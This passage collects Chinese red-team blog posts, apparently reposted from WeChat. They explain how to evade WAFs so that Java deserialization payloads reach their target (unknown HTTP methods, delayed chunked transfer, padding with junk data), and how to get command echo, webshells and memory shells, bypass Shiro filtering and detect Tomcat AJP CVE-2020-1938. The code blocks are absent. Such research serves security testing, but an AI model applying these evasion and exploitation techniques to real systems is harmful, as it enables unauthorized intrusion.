方法简单粗暴，不难推断WAF是通过正常的http方法识别HTTP数据包的。但是为何后端中间件依然能拿到rememberMe的结果呢？

于是我在本地代码org.apache.shiro.web.mgt.CookieRememberMeManager#getRememberedSerializedIdentity处下了断点。

通过XXX方法发送数据包，调试发现request.getCookies可以获取到rememberMe值，而且如下方法均可正常使用。说明未知HTTP请求方法不影响各类参数的读取。

那对三大组件的调用是否有影响呢？继续翻阅Tomcat源码，我发现Listener被调用是受行为事件影响，Filter是受请求路径影响，而Servlet是受请求路径和HTTP请求方法影响。一旦遇到未知方法，Servlet不再进入业务代码，直接返回一个http.method_not_implemented报错。具体代码如下：

所以得到一个结论就是 未知Http方法名绕WAF这个姿势，可以使用在Filter和Listener层出现的漏洞，同时WAF不解析的情况。

阅读原文

跳转微信打开

Java反序列化数据绕WAF之延时分块传输

Tue, 24 Aug 2021 12:00:00 +0800

c0ny1 2021-08-24 12:00

让分块传输重振往日雄风

0x01

背景

chunked-coding-converter在0.2.1以及之前版本是不支持对二进制数据进行分块的。这个问题实验室的darkr4y师傅今年3月份的时候就已经反馈了多次，由于懒癌在身一直没有更新。直到我自己遇到一个站点，反序列化带大量脏数据没有绕成功，于是又想起了分块传输。花了一点时间让插件支持了二进制数据，然而这样依然被拦截了！

这也在意料之中，分块传输被公开已经有两年之久，很多WAF已经支持检测。那有没有办法让这个姿势重振往日雄风呢？

0x02

延时分块

通过测试，WAF一般是如下应对分块传输的。

1. 发现数据包是分块传输，启动分块传输线程进行接收

2. 分块传输线程不断接收客户端传来的分块，直到接收到0\r\n\r\n

3. 将所有分块合并，并检测合并之后的内容。

当时和darkr4y师傅交流时，我们曾做过一个设想，在上一块传输完成后，sleep一段时间，再发送下一块。目的是在2阶段延长WAF分块传输线程的等待时间，消耗WAF性能。这时有没有可能WAF为自身性能和为业务让步考虑，而放弃等待所有分块发送完呢？。这次正好遇到适合的环境来验证一下想法。

当然了，我们块与块之间发送的间隔时间必须要小于后端中间件的post timeout,Tomcat默认是20s,weblogic是30s。

0x03

编码实现

为了加大WAF的识别难度，我们可以考虑以下3点。

1. 延时时间随机化

2. 分块长度随机化

3. 垃圾注释内容与长度随机化[可选]

首先我们需要对原始request header进行处理。需要把Content-Length删除，分块传输不需要发送body长度，然后加上Transfer-Encoding: chunked头。

其实调用HttpURLConnection.setChunkedStreamingMode(int chunkedLen)就可以实现分块发包。不过这个接口只能设置固定分块长度，而且无法直接控制分块时间间隔。于是我打算用socket来模拟发送http/https分块传输包，这样要灵活的多。以下是实现的简化代码。

为了方便日后使用，我给chunked-coding-converter插件添加了sleep chunked sender，并添加很多细节功能，比如预估分块数量范围和延时范围，显示每一块发送的内容，长度，延时时间以及发送状态等等。

这里我直接使用最新版本，将被拦截的数据分成218块，共延时1分46秒发送，最终成功绕过WAF。

0x04

一些零碎

最后列一点边边角角的东西，当餐后”甜点“，需要请自取。

1. 只有HTTP/1.1支持分块传输

2. POST包都支持分块，不局限仅仅于反序列化和上传包

3. Transfer-Encoding: chunked大小写不敏感

阅读原文

跳转微信打开

高危漏洞狙击框架:woodpecker-framework

Tue, 10 Aug 2021 12:00:00 +0800

原创 c0ny1 2021-08-10 12:00

这是我对漏洞精准检测和深度利用的思考

0x01

简介

woodpecker-framework是一款高危漏洞综合利用框架，目的是可以狙击高危漏洞，拿到权限！其设计是由我在日常红队外围打点经验抽象得来。它的每个模块和外围打点的主要流程是一一对应的。

比如遇到一个具体的外围应用，渗透测试的流程是：

1. 探测当前应用所有攻击面和风险点（信息探测模块）

2. 使用poc探测漏洞是否存在 (精准检测模块)

3. 通过exp拿下webshell (深度利用模块)

4. 遇到奇葩环境漏洞环境自动化无法打死，需要人工生成payload （荷载生成模块）

5. 人工构造payload时经常需要做一些常规操作，比如把Class变成BCEL编码，runtime.exec命令变形等等（辅助模块）

下面围绕weblogic和shiro这两个高频漏洞应用来介绍详细每个模块。

0x02

信息探测模块（InfoDetector）

信息探测模块的任务是寻找当前应用最薄弱的点。显然有用的信息是判断的重要依据。这里探测的信息不是什么操作系，中间件，cms之类的指纹识别。而是针对具体应用的攻击面和风险点的探测，比如weblogic就会探测如下信息。

1. weblogic是那个版本

2. 协议是否开启t3/iiop协议

3. web端口是否可以访问到console，wls，async之类的组件

顺便值得一提的是，我们探测t3/iiop协议的时候，还需要探测它们是否被设置为禁止连接，不然探测出open也是无法利用的。如上图的t3开启了但是配置了如下过滤。

这些信息有什么用呢？当然是让我们知道面前这个weblogic的薄弱点在哪里，后续攻击的计划应该是:t3和iiop系列漏洞不用测试了，wls-wsat组件的xmldecoder反序列化漏洞可以看看。

0x03

精准检测模块(POC)

精准检测模块的任务是使用poc去判断漏洞是否存在。显然精准是这个模块关注的问题，我们的原则是误报可以原谅，但是漏报坚决杜绝。

那现实如此复杂的漏洞环境，怎么实现精准检查呢？woodpecker插件的检测原则是尽可能的实现以下所有检测方案。

1. 回显检测

2. dnslog检测

3. 间接检查

4. 写文件检测

5. 触发补丁检测

6. 延时检测

7. 特定特征检测

8. ....

这里我细说下3,5和7这三个方案，其他方案顾名思义。

间接检测是不通过直接触发漏洞来检测，而是通过其他方面间接来验证。举2个例子，shiro key的检测由开始的通过回显，dnslog之类的直接检测变成了现在统计rememberMe个数。weblogic漏洞检测则可通过下载黑明单class来验证是否被修复。这些方法很巧妙，在漏检中有四两拨千斤的作用。

1. 一种另类的 shiro 检测方式

2. 红蓝必备你需要了解的weblogic攻击手法

触发补丁检测就是提交可触发补丁的payload，然后看是否拦截来确定漏洞是否修复。比如CVE-2019-2725我们就可以发送带标签的payload，若如下提示非法标签说明漏洞修复了。

特定特征检测就是通过respone的某些特征可以知道漏洞是否修复，比如CVE-2020-14882/3漏洞修复后的响应如下,那咱们就可以通过repsoen状态码为500,返回包中存在The server encountered an unexpected condition which prevented it from fulfilling the request.提示来判断。

0x04

深度利用模块(Exploit)

深度利用模块的任务是发挥漏洞的最大利用价值。比如一个RCE可以干的事情很多，命令执行，写文件，读文件，反弹shell，注入内存马，开启bindshell等等。不过最后我梳理了下，很多功能都是有交集的，比如反弹shell可以通过命令执行来反弹，读文件可以通过webshell来读。所以在红队行动中，真正对我们有用的一般是三个功能，woodpecker插件编写的原则上要求深度利用模块必须实现这3个功能，并保证稳定性。

1. 写文件

2. 命令回显

3. 注入内存马

0x05

荷载生成模块(Payload generator)

荷载生成模块的任务是帮助红队人员快速生成自定义payload。 自动化并不能解决所有问题，当遇到奇葩环境时就需要人工介入。比如当shiro漏洞遇到未知中间件时，可能无法回显也无法注入内存马，这时就需要人工构造payload了。但是每次都要先生成序列化数据，设置key，选择加密模式，非常浪费时间。而woodpecker shiro漏洞插件的荷载生成模块可以一键生成。

0x06

辅助模块(Helper)

该模块的任务是将漏洞检测和利用中经常要进行的操作自动化，节省时间。

比如在java命令执行漏洞中无法使用带有管道符的命令，需要我们去转换下命令。当然有Jackson_T这样的在线网站，这里我编写成了本地插件。

https://github.com/woodpecker-appstore/runtime-exec-encoder

同时如果想通过命令执行漏洞写一个shell的话，往往需要转义下，这个过程也是比较繁琐的。可以使用EchoToFileConverter插件来解决。

https://github.com/woodpecker-appstore/EchoToFileConverter

0x07

最后的话

如果你比较认同这样的设计，并有能力编写插件。欢迎到github提交pr或者插件。

1. 框架主页 https://woodpecker.gv7.me

2. 框架仓库 https://github.com/woodpecker-framework

3. 插件仓库 http://github.com/woodpecker-appstore

阅读原文

跳转微信打开

Java反序列化数据绕WAF之加大量脏数据

Mon, 02 Aug 2021 12:00:00 +0800

原创 c0ny1 2021-08-02 12:00

二进制的Java反序列化数据如何绕WAF?

0x01

背景

前几周有个同事发给我一个授权的站点,需要拿下webshell权限。发现存在Java反序列化漏洞，但是有WAF,ysoserial生成的序列化数据直接就被拦截了。

绕WAF的前提自然是先摸清WAF拦截的规则。我先是把序列化头aced0005删掉，发现还是被拦截了,看来WAF没开启无脑的hw模式。

接着将序列化数据当中的class名破坏，发现不再拦截了。说明WAF应该是把gadget的class加入了规则。

考虑到大多数WAF受限于性能影响，当request足够大时，WAF可能为因为性能原因作出让步，超出检查长度的内容，将不会被检查。于是我在序列化头后加了50000个x字符，发现WAf不再拦截，证明这个思路可行！

这样虽然绕过了WAF，但新的问题也来了。序列化数据是二进制数据，直接手工在burp里加入垃圾数据破坏了序列化数据的结构，后端代码并没有反序列化成功。接下来继续解决这个问题。

0x02

如何给序列化数据加脏数据？

我的思路是需要找到一个class可以序列化，它可以把我们的脏数据对象和ysoserial gadget对象一起包裹起来。

所以我们要找的class，第一需要实现java.io.Serializable接口，第二可以存储任意对象。这么看来集合类型就非常符合我们的需求。

1. ArrayList

2. LinkedList

3. HashMap

4. LinkedHashMap

5. TreeMap

6. ......

伪代码如下:

0x03

改造ysoserial

为了方便日后使用，我们可以改造下ysoserial，让所有gadget都支持添加大量垃圾数据。大致的流程调用是，构造函数传入gadget对象以及垃圾数据长度，然后调用doWrap方法随机创建一个集合类型把随机生成的脏数据和gadget对象存储起来，最终序列化该对象即可拿到bypass WAF的序列化数据。具体实现参考如下代码和注释。

完整代码请移步ysoserial-for-woodpecker项目(https://github.com/woodpecker-framework/ysoserial-for-woodpecker)

通过如下命令就可以生成带有40000脏数据的CommsonCollects6序列化数据。

把cc6-dnslog.ser复制到burp中发送，完美饶过waf收到dnslog!

0x04

留一个小问题

其实不是所有的集合类都适合用于包裹脏数据和gadget，比如LinkedHashSet,HashSet，TreeSet等类就不适合。至于为何，留给大家思考。

阅读原文

跳转微信打开

使用自定义ClassLoader解决反序列化serialVesionUID不一致问题

Fri, 10 Jul 2020 09:00:00 +0800

原创 c0ny1 2020-07-10 09:00

Java反序列化serialVesionUID不一致解决方案

爱德华·马奈-沙滩上（1873年夏）

0x01

背景

serialVesionUid不一致导致反序列化失败也算是Java反序列化漏洞利用比较常见的问题了。查了下资料，发现了各种各样的方法，但没有找到一种适合所有gadget的通用解决方案，为此我花了一些时间，算是找到了自己心中比较完美的解决方案：自定义ClassLoader。目前已经将其集成到ysoserial中，可完美解决各类gadget serialVesionUID不一致问题。

0x02

各方案的优劣

在解决这个问题之前，我尝试的很多方法，简单说下它们各自能解决的问题和存在的缺陷。

方案1:修改序列化byte数据

该方法可解决序列化最终数据的serialVesionUID不一致，但无法解决Object的serialVesionUID不一致

方案2:反射修改serialVesionUID

可以解决1的缺陷，但无法解决Gadget依赖的class没有serialVesionUID属性的情况，因为反射只能修改Object的属性，不能添加。

方案3:修改Class字节码，添加或修改serialVesionUID

能解决Gadget直接依赖Class的serialVesionUID不一致问题，可弥补方案2的缺陷。但不好解决Gadget间接依赖class存在serialVesionUID不一致的情况。

方案4:ObjectStreamClass.getSerialVesionUID()

该方法负责返回所有参与序列化Class的serialVesionUID，Hook它并修改返回值，可解决所有class的serialVesionUID不一致问题。但它无法解决Gadget依赖jar版本之间，class差异较大，属性类型不同的情况。serialVesionUID发生改变的本质是因为Class的属性和方法发生了改变，如果属性类型改变了，单单只修改serialVesionUID是不够的。

方案5:URLClassLoader

使用URLClassLoader动态引入依赖jar可以很好的解决以上方案的缺陷。只是用在该场景下有些费劲，原因有三：

第一，不方便隔离依赖。包含serialVesionUID不一致class的jar（这里简称不一致jar）是需要被隔离的,因为URLClassLoader是双亲委派模式，存在被父ClassLoader中的同名Class覆盖的风险。
第二，不方便共享依赖。Gadget依赖的部分jar可能不存在serialVesionUID不一致问题（这里简称可共用jar），我们需要共享。
第三，不方便添加Class到ClassLoader中，URLClassLoader只提供添加jar的方法。

0x03

自定义ClassLoader解决方案

在我看来比较完美的方案不仅要解决以上方案的缺陷，还要能防止各种未知的"副作用"。使用ClassLoader来解决的思路肯定是没错,但我们需要结合解决serialVesionUID不一致问题这个场景量身设计一个ClassLoader，核心有两点：

1. 改双亲委派为当前ClassLoader优先，方便隔离不一致jar共享可共用jar

2. 方便添加Class和Jar到ClassLoader中

那么自定义ClassLoader是如何解决serialVesionUID不一致问题的呢？

自定义ClassLoader可以很方便地切换不一致jar为漏洞环境的对应版本，生成的发序列化数据自然不会存在serialVesionUID不一致问题。

具体实现如下图，我们自定义ClassLoader包含了Gadget class和不一致jar。当Gadget class实例化生成序列化对象时，由于当前ClassLoader优先原则，存在不一致问题的class使用的是自定义ClassLoader加载的，实现隔离。而其他Class找不到，自然走双亲委派模式，去父ClassLoader中查找，实现共享。

下面我们分别来实现。

0x04

addClass && addJar

首先我们自定义的ClassLoader需要维护要一个装载Class的Map classByteMap,类名为键，类文件byte数据为值。方便后续添加和获取Class。

addClass方法，主要是为了方便我们我们把Gadget对应的class添加的自定义ClassLoader中。

addJar方法，主要是为了方便把gadget的不一致jar快速添加到ClassLoader中。具体来说就是读取不一致jar中所有class的class name和class byte，存储到classByteMap中。

0x05

改双亲委派为自定义ClassLoader优先

要想打破双亲委派，我们需要重新loadClass方法,修改加载逻辑为优先使用自定义ClassLoader加载。

findClass方法定义的是自定义ClassLoader查找Class的逻辑

0x06

编写版本兼容gadget

依然以ysoserial CommonsBeanutils1为例子。ysoserial中默认commons-beanutils是1.9.2版本，下面我们给它添加一个兼容1.8.3版本的CommonsBeanutils1_183。

通过对比1.9.2和1.8.3序列化数据，发现serialVesionUID不一致的只有org.apache.commons.beanutils.BeanComparator类，它在commons-beanutils-.jar中，剩余的commons-collections-3.1.jar和commons-logging-1.2.jar为可共用jar。

接着就可以编写代码，调用自定义ClassLoader SuidClassLoader来解决serialVesionUID不一致问题了。

Weblogic coherence.jar的gadget可如法炮制。近期忙完会将完整的代码上传到github项目

http://github.com/woodpecker-framework/ysoserial-woodpecker

阅读原文

跳转微信打开

半自动化挖掘request实现多种中间件回显

Mon, 20 Apr 2020 09:00:00 +0800

原创 c0ny1 2020-04-20 09:00

Avicii forever

0x01

前言

本文献给永远的Avicii,严格意义上我不算是一个reaver。但并不妨碍我深深的喜欢你的作品，它们陪伴着我度过了无数个编程的夜晚，十分感谢。今天不同人用不同的方式怀念你，我不会作曲，也不敢纹身。能给你分享的是我所热爱的事，在我看来这是最有质感的东西。R.I.P

0x02

背景

最近圈子里各位师傅都在分享shiro回显的方法，真是八仙过海过海各显神通。这里我也分享下自己针对回显的思考和解决方案。师傅们基本都是考虑中间件为Tomcat，框架为Shiro的反序列化漏洞如何回显。这里我从更大的层面来解决回显问题。也就是在任意中间件下，任意框架下可执行任意代码的漏洞如何回显？

0x03

基本思路

回显的方式有很多种类，通过获取request对象来回显应该是最优雅通用的方法。而之前师傅们获取requst的方式基本都是去阅读和调试中间件的源码，确定requst存储的位置，最终反射获取。其实提炼出来就是两个步骤。

第一步：寻找存储有request对象的全局变量

这一步定位的是requst存储的范围，需要靠知识沉淀或阅读源码来确定request对象被存储到那些全局变量中去了。

为何要考虑全局变量呢？这是因为只有是全局的，我们才能保证漏洞触发时可以拿到这个对象。

按照经验来讲Web中间件是多线程的应用，一般requst对象都会存储在线程对象中，可以通过Thread.currentThread()或Thread.getThreads()获取。当然其他全局变量也有可能，这就需要去看具体中间件的源码了。比如前段时间先知上的李三师傅通过查看代码，发现MBeanServer中也有request对象。

第二步：半自动化反射搜索全局变量

这一步定位的是requst存储的具体位置,需要搜索requst对象具体存储在全局变量的那个属性里。我们可以通过反射技术遍历全局变量的所有属性的类型，若包含以下关键字可认为是我们要寻找的request对象。

Requst
ServletRequest
RequstGroup
RequestInfo
RequestGroupInfo
...

0x04

编码实现

思路虽然简单，但实现反射搜索的细节其实还是有很多坑的，这里列举一些比较有意思的点和坑来说说。

4.1 限制挖掘深度

对于隐藏过深的requst对象我们最好不考虑，原因有两个。

第一个是这样反射路径过长，就算是搜索到了，最终构造的payload数据会很大，对于shiro这种反序列化数据在头部的漏洞是致命的。
第二个是挖掘时间会很长，因为JVM虚拟机内存中的对象结构其实是非常的复杂的，一个对象的属性往往嵌套着另一个对象，另一个对象的属性继续嵌套其他对象...

可以声明两个变量来代表当前深度和最大深度，通过防止当前深度大于最大深度，来限制挖掘深度。

4.2 排除相同引用的对象

一个对象中可能会存在其他对象多个相同的实例(引用相同)，是不能重复去遍历它属性的，否则会进入死循环。可以声明一个visited集合来存储已经遍历过的对象，在遍历之前先判断对象是否在该集合中，防止重复遍历！

4.3 设置黑名单

某些类型不可能存有requst，一般有如下的系统类型,和一些自定义的类型。对于这些类型的对象的遍历只会浪费时间，我们可以设置一个黑名单将其排除掉。

java.lang.Byte
java.lang.Short
java.lang.Integer
java.lang.Long
java.lang.Float
java.lang.Boolean
java.lang.String
java.lang.Class
java.lang.Character
java.io.File
...

4.4 搜索继承的所有属性

getFields()和getDeclaredFields()其实都没法获取对象的所有属性，导致搜索会有遗漏。比如一个对象的父类的父类的一个私有属性，我们怎么获取呢？

4.5 深度优先 vs 广度优先

深度优先顾名思义就是会按照深度方向挖掘，它会先遍历至全局变量第一个属性最深层的所有末端，在继续第二属性依次类推。这样挖掘出来的反射链是比较长的。

在我实现完深度优先算法后，发现最致命的还不是反射链过长问题。深度优先可能会错过比较短的反射链。这是因为同一个requst对象的引用可能被存储在全局对象的多个属性中，有些藏的比较深，有的藏的比较浅。深度优先往往会先挖掘到比较深的那个，而根据我们相同对象不会第二次搜索原则，当搜索到存储比较浅的引用时，会被忽略了。这就导致我们只挖掘到了藏的比较深的，而错过了比较浅的。

在学过算法，我们都知道广度优先就能解决路径最短问题，在这个问题上也是如此。针对上图的情况，两种算法挖掘的结果如下。

深度优先挖掘到两条反射链

1. 全局变量 > Field01 > Field03 > Request@111

2. 全局变量 > Field04 > Request@222

广度度优先挖掘到两条反射链

1. 全局变量 > Request@111

2. 全局变量 > Field04 > Request@222

而在实际环境中差别更加明显，以下是Tomcat8下搜索记录的对比。

0x05

实战挖掘

基于以上想法，我设计了一款java内存对象搜索工具java-object-searcher，它可以很方便的帮助我们完成对request对象的搜索，当然不仅仅用于挖掘request。下面以Tomcat7.0.94为例挖掘requst。

项目地址：https://github.com/c0ny1/java-object-searcher

5.1 引入java-object-searcher

去java-object-searcher项目的releases下载编译好的jar，引入到web项目和调试环境中。

5.2 编写调用代码进行搜索

然后我们需要断点打在漏洞触发的位置，因为全局变量会随着中间件和Web项目运行被各个模块修改。而我们需要的是漏洞触发时，全局变量的状态（属性结构和值）。

接着在IDEA的Evaluate中编写java-object-searcher的调用代码，来搜索全局变量。

5.3 根据挖掘结果构造回显payload

根据上述挖掘到的反射链来构造回显，具体代码如下：

最终生成反序列化数据提交至服务器即可回显

通过java-object-searcher，我不仅挖掘到了之前师傅们公开的链，还挖掘到了其他未公开的。同时在其他中间件下也实现了回显，下面列举几个比较冷门的中间件。

1. Jetty

2. WildFly

3. Resin

0x06

最后的思考

有了半自动化，就想着全自动。这种运行时动态挖掘的局限性是需要人工确定那些全局变量存有request，这是只能半自动的原因。那么是否可以通过静态分析源码的方式来解决呢？比如gadgetinspector原来是挖掘gadget的，能否更换它的source和slink定义，将其改造为全自动化挖掘request呢？有兴趣的朋友可以去试试。

PS:写到这里我在想Avicii在写完《The Nights》时是怎样的心情，或许和我此时的心情一样，无以言表。

阅读原文

跳转微信打开

如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)

Fri, 27 Mar 2020 19:00:00 +0800

原创 c0ny1 2020-03-27 19:00

研究在Spring MVC/Boot,Shiro,Struts下如何检测该漏洞

通过上篇文章《CVE-2020-1938:Tomcat AJP协议文件包含漏洞分析》，我们知道这个漏洞出现在Tomcat默认的两个Servlet，一个是DefaultServelt，可以任意文件读取。第二个是JspServlet，可以用于文件读取和代码执行。

所以我们漏洞利用的关键是让精心构造的数据包最终让这两个Servlet处理。但是在真实环境下的Web项目情况很复杂，会添加自定义的Servlet和Filter，使用各种框架和组件。它们的Servlet和Filter匹配规则会影响我们构造的数据包处理流向，导致我们无法检查成功。本文我们会针对常见的5种情况并一一解决！

0x01

知识储备

在分析前我们需要对Tomcat匹配规则优先级有一个了解，匹配的优先级如下，优先级从上到下：

精确匹配（例如：/admin/index.html）
路径匹配 (例如：/*)
拓展名匹配 (例如：*.jsp,*.jspx)
缺省匹配 （比如:/）

具体的匹配细节可以查看Tomcat源码org.apache.catalina.mapper.Mapper#internalMapWrapper()

0x02

情况一：原生Servlet环境下

Tomcat下存在多个默认的web项目，由于它们没有使用任何框架，所以借助它们来检查再好不过了。

docs
examples
host-manager
manager

当没有默认的web项目，我们只能检查ROOT下的项目了。在使用原生Servlet开发的web应用中，我们要考虑的是开发人员自定义filter和自定义servlet对漏洞影响。

按照开发经验，一般过滤器是不会过滤.js,.css,.ico等静态文件后缀的url，同时自定义的Servlet也不会去处理这些url。所以我们可以构造类似如下请求来绕过它们带来的影响。

‍

0x03

情况二：Sping mvc环境下

Spring MVC的经典配置如下(图搞错了改不了，看博客原文吧)

虽然覆盖掉了DefaultServlet的匹配路径，但是*.jsp,*.jspx依然会交给JspServlet处理，所以我们可以构造如下请求让JspServlet来触发漏洞。

‍

这里顺便回答下上一篇文章提的问题

问题：如果已经知道某个contoller使用的是jsp为视图模版来渲染数据，我们能否通过它来触发漏洞？

答：其实是不可以的。因为spring mvc会将模版渲染后，交给JspServlet去处理之前，会调用org.apache.catalina.core.ApplicationDispatcher#doInclude方法对3个include属性进行重新赋值，也就是把我们之前设置的值覆盖掉了不再可控！

0x04

情况三：Spring boot环境下

Srping boot结合Tomcat来部署有两种方式，分别是外置和内嵌。

5.1 内嵌Tomcat

我们先来说内嵌，它是默认的部署方式。顾名思义就是spring boot内部代码来调用Tomcat提供Web服务。这种方式默认AJP是不开启的。

若开启AJP，DefaultServlet的匹配路径也会将org.springframework.web.servlet.DispatcherServlet覆盖，而JspServlet这个是没有被注册的，因为该类在jasper.jar中，Spring boot默认的依赖中没有。

这里值得一提的是有一种情况是可以触发漏洞的，当Spring boot需要以JSP为视图模版时，jasper.jar需要被引入。通过调试Spring boot发现会自动注册一个将*.jsp和*.jspx给Jspservlet的处理的mapper，具体参考以下两处源码。

org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory#prepareContext

org.springframework.boot.web.servlet.server.AbstractServletWebServerFactory#shouldRegisterJspServlet

5.2 外置Tomcat

外置就是把SpringBoot项目打成war，部署到tomcat的webapps目录下。这种情况下的检测和Spirng MVC情况一样。

所以综合来看，内置情况下只有配置开启了AJP并引入了jasper.jar才可以被利用，这种情况较少。外置情况下可以直接利用，这种情况也较少。所以我认为Spring boot出现该漏洞的可能性不大。

0x05

情况四：shiro环境下

经典配置下shiro过滤器会对所有路径进行过滤，对url的访问权限有如下5个属性。

anon: 无需认证即可访问
authc: 需要认证才可访问
user: 点击“记住我”功能可访问
perms: 拥有权限才可以访问
role: 拥有某个角色权限才能访问

假设配置如下，在未登录情况下只能访问被配置为anon权限的login.jsp，访问其他链接都会302跳转至登录页面。所以只能请求这个页面来触发漏洞。

但我们在自动化中如何发现被配置为anon权限的URL呢？实验室的@背影师傅给了一条很重要的提示，可以通过该漏洞设置request对象属性shiroFilter: 1来“关闭”shiro的拦截功能。

如果request对象的属性名alreadyFilteredAttributeName的值不为空，那么将直接交给Tomcat的servlet处理，相当于关闭了shiro的拦截！

alreadyFilteredAttributeName变量等于shiro过滤器名+.FILTERED。通过查看代码发现shiroFilter其实是web.xml设置的shiro过滤器名，这是由开发人员自定义的，故带来了新的问题。若不知道shiro过滤器名怎么办呢？

通过调试shiro，发现请求会被上面说的5种权限过滤器，依次匹配并处理。最重要的是它们的名字固定！于是按照同样的方法，都给它们设置上已过滤flag，即可绕过shiro的限制。具体请求构造如下：

0x06

情况五：Struts2环境下

以下分析的是Struts2 2.5.22

使用Struts2框架一般需要设置如下的全局过滤器

该过滤器默认会将后缀为空和.action的URL请求，交给Struts2的Action处理，而其他后缀就交给Tomcat默认Servlet处理，漏洞利用需要让其走后者。

然而在请求路径的获取上Struts2有别于其他环境，这是导致漏洞利用方式稍有不同。它通过request对象的javax.servlet.include.servlet_path属性获取，而不是request.getServletPath()。

org.apache.struts2.dispatcher.mapper.DefaultActionMapper#getUri()

所以我们在这里必须设置该属性值为非空非.action的后缀test.jsp,才能让Tomcat的JspServlet来处理。但是如果我们还是使用原来的方式读/WEB-INF/web.xml是行不通的，因为最终构造的路径如下是错误的。

那我们能否将javax.servlet.include.path_info设置为/../WEB-INF/web.xml来吃掉1.jsp形成正确路径呢？答案是可以的！

可能看过我之前漏洞分析文章的朋友会说，不是说路径里不能使用../进行跳目录么？其实是可以跳目录，只是不能跳出webapps而已。这里重新说明下路径校验函数normalized()的功能。

该方法的功能是中和掉路径中的./和../，比如/a/.//b/../c就会被中和为/a/c。如果最后依然存在../在开头，才会返回null，最终抛出非法路径的异常。

所以在Struts2框架下检测该漏洞，需要构造如下请求来绕过。

0x07

扫描演示

最后便可以将以上各个场景的特点综合起来，编写扫描工具了。这里我搭建了SpringMVC + Shiro的环境进行演示。可以发现其他的url都重定向了，只有针对shiro构造的请求是200，并成功触发漏洞！

0x08

最后的话

1. 本文只对每种环境较新版本进行分析，所以提供的扫描方案不可能适配所有版本环境，算是对精确检测做一个抛砖引玉。

2. 每种环境下的检测方案，只考虑使用Tomcat默认存在缺陷的两个Servlet（JspServlet和DefaultServlet）来检测，更完美的方案应该是去找每种环境下其他存在缺陷的Servlet。

阅读原文

跳转微信打开